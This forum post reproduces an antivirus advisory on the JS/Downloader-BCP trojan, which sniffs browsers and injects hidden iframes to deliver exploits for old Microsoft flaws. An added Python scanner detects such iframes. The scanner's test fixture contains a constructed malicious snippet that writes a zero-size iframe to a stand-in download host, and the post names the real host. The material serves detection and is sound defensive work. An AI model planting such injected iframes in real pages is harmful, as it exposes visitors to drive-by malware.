Posted by: Amker
« on: 16. June 2007., 15:15:05 »

The JavaScript detected as JS/Downloader-BCP is responsible for downloading various other files that exploit previously released Microsoft vulnerabilities.
Characteristics -
Downloaders are designed to pull files from a remote website and execute the files that have been downloaded. The nature of the remote file may vary. As the presence of these trojans and remote files is discovered, sites hosting these files are frequently taken down, so the downloading may cease to function as expected. This may result in empty, 0 byte files or HTML error messages being downloaded instead, or the remote file simply not being downloaded at all.
The JavaScript detected as JS/Downloader-BCP is responsible for downloading various other JavaScripts / files that exploit previously released Microsoft vulnerabilities. This script checks for the presence of various antivirus software and then inserts an iframe which points to a malicious file that exploits some vulnerability. Which malicious file the iframe points to is decided based on the browser in which JS/Downloader-BCP is running.
The downloaded scripts may use the following exploits to install trojans on the compromised machine:
MS06-044
MS05-054
MS05-036
MS06-055
It tries to download the malicious code from:
http://ijk.cc/E/[REMOVED]
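The behaviour described above (browser sniffing, then a hidden iframe written into the page pointing at an off-site host) is a pattern a web-content scanner can flag. The following is an added example, not code from the original post or from McAfee: a small Python scanner that inspects HTML for iframes that are hidden (zero or one-pixel dimensions), point off-site, are emitted at runtime via document.write, or sit next to navigator.userAgent sniffing. The two page fragments, the host name www.example.com and the host downloader.example.invalid are constructed for the example; the real script and its download host are not reproduced.

```python
import re
from urllib.parse import urlparse

# Constructed sample fragments (not the real JS/Downloader-BCP script).
SAMPLE_BENIGN = """
<html><body>
<script>var greeting = "hello"; document.getElementById("x").innerText = greeting;</script>
<iframe src="/widgets/map.html" width="600" height="400"></iframe>
</body></html>
"""

# Mimics the advisory's pattern: sniff the browser, then write a hidden off-site iframe.
SAMPLE_SUSPICIOUS = """
<html><body>
<script>
var ua = navigator.userAgent.toLowerCase();
if (ua.indexOf("msie 6") != -1) {
  document.write('<iframe src="http://downloader.example.invalid/E/a.htm" width=0 height=0 frameborder=0></iframe>');
}
</script>
</body></html>
"""

SITE_HOST = "www.example.com"  # assumed host of the page being inspected

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
DOC_WRITE_RE = re.compile(r"document\.write\s*\(", re.IGNORECASE)
UA_SNIFF_RE = re.compile(r"navigator\.(userAgent|appVersion|appName)", re.IGNORECASE)


def parse_attrs(attr_text):
    """Turn the raw attribute text of a tag into a lower-cased name -> value dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def _is_tiny(value):
    """True for width/height values of 0 or 1 (pixels), the usual way to hide an iframe."""
    if value is None:
        return False
    digits = re.match(r"\d+", value.strip())
    return digits is not None and int(digits.group()) <= 1


def _inside_script(html, pos):
    """True if position pos lies between an unclosed <script> and its </script>."""
    lower = html.lower()
    open_idx = lower.rfind("<script", 0, pos)
    close_idx = lower.rfind("</script", 0, pos)
    return open_idx != -1 and open_idx > close_idx


def scan(html, site_host=SITE_HOST):
    """Return a list of suspicious iframes, each with the reasons it was flagged."""
    findings = []
    sniffs = bool(UA_SNIFF_RE.search(html))
    writes = bool(DOC_WRITE_RE.search(html))
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        reasons = []
        if host and host.lower() != site_host.lower():
            reasons.append("offsite-src:" + host)
        if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
            reasons.append("hidden-dimensions")
        # iframe markup located inside a <script> block next to document.write
        # means it is injected at runtime rather than being static page content.
        if writes and _inside_script(html, m.start()):
            reasons.append("written-by-script")
        if sniffs and reasons:
            reasons.append("browser-sniffing")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(name, scan(sample))
```

The scanner only reports an iframe when at least one structural indicator is present, so a legitimate same-site, visible iframe produces no finding; browser sniffing on its own is common and is only added as a reason when it accompanies another indicator.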
Symptoms -
Upon execution, the trojan attempts to download files from the site: http://ijk.cc/E/[REMOVED]
Method of Infection -
N/A. Downloaders are not viruses, and as such do not themselves contain any method to replicate. However, they may themselves be downloaded by other viruses and/or trojans to be installed on the user's system.
Many of these are additionally mass spammed by the author to entice people into activating them.
Alternatively, they may be installed by visiting a malicious web page (either by clicking on a link, or by the website hosting a scripted exploit which installs the downloader onto the user's system with no user interaction).
Removal -
AVERT recommends always using the latest DATs and engine. This threat will be cleaned if you have this combination.
Additional Windows ME/XP removal considerations
McAfee